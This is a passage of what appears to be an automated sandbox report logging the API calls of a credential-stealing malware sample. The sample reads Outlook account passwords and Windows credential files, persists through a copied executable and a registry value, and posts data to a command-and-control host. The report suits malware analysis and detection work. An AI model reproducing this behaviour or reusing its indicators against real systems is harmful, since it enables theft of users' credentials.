| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = NNTP Server, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP Server, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User Name, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP Server URL, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTPMail User Name, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTPMail Server, type = REG_NONE |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Port |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Port |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP Port |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password2 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP Password2 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = NNTP Password2 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTPMail Password2 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Password2 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP Password |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = NNTP Password |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP Password |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Password |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001, value_name = Email, type = REG_NONE |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| System | Sleep | duration = 10 milliseconds (0.010 seconds) |
|
2 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25, type = file_attributes |
|
1 | |
| File | Create Directory | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25 |
|
1 | |
| File | Create | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| System | Get Computer Name | result_out = LHNIWSJ |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
2 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
3 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = NETAPI32, base_address = 0x747c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ucrtbase.dll, function = NetUserGetInfo, address_out = 0x74762130 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
3 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.103.63, 104.24.102.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.103.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 254, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 254, size_out = 254 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 352 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25, type = file_attributes |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| File | Delete | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb |
|
1 | |
| File | Create | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.hdb, size = 4 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25, type = file_attributes |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| File | Create | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck, size = 1 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
4 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| File | Create | filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D, size = 11264, size_out = 11264 |
|
1 | |
| File | Delete | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.lck |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| System | Get Computer Name | result_out = LHNIWSJ |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
2 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
3 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = NETAPI32, base_address = 0x747c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ucrtbase.dll, function = NetUserGetInfo, address_out = 0x74762130 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
3 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.103.63, 104.24.102.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.103.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 190, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 190, size_out = 190 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 352 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 259 |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25, type = file_attributes |
|
1 | |
| File | Move | source_filename = C:\Windows\SysWOW64\svchost.exe, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| File | Copy | source_filename = C:\Windows\SysWOW64\svchost.exe, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe |
|
1 | |
| Module | Load | module_name = SHELL32, base_address = 0x752c0000 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| File | Get Info | filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25, type = file_attributes |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
11 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
1 | |
| Registry | Write Value | reg_name = HKEY_LOCAL_MACHINE\������К����ы�Б�����Й��я��, value_name = BAEF25, data = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\BAEF25\5E987D.exe |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| System | Get Computer Name | result_out = LHNIWSJ |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
2 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
3 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
1 | |
| Module | Load | module_name = NETAPI32, base_address = 0x747c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ucrtbase.dll, function = NetUserGetInfo, address_out = 0x74762130 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
3 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.103.63, 104.24.102.63, service = 80 |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Connect | remote_address = 104.24.103.63, remote_port = 80 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x74ad0000 |
|
2 | |
| Socket | Send | flags = NO_FLAG_SET, size = 235, size_out = 235 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ewued.tk, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php |
|
1 | |
| Inet | Send HTTP Request | headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: */*, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 163, size_out = 163 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4048, size_out = 360 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| System | Sleep | duration = 60000 milliseconds (60.000 seconds) |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
4 | |
| DNS | Resolve Name | host = ÅÐÐÑÐÐÑ, service = 80 |
|
1 | |
| Module | Load | module_name = ADVAPI32, base_address = 0x74c60000 |
|
8 | |
| Module | Load | module_name = shlwapi, base_address = 0x74c10000 |
|
3 | |
| DNS | Resolve Name | host = ewued.tk, address_out = 104.24.103.63, 104.24.102.63, service = 80 |
|
1 | |
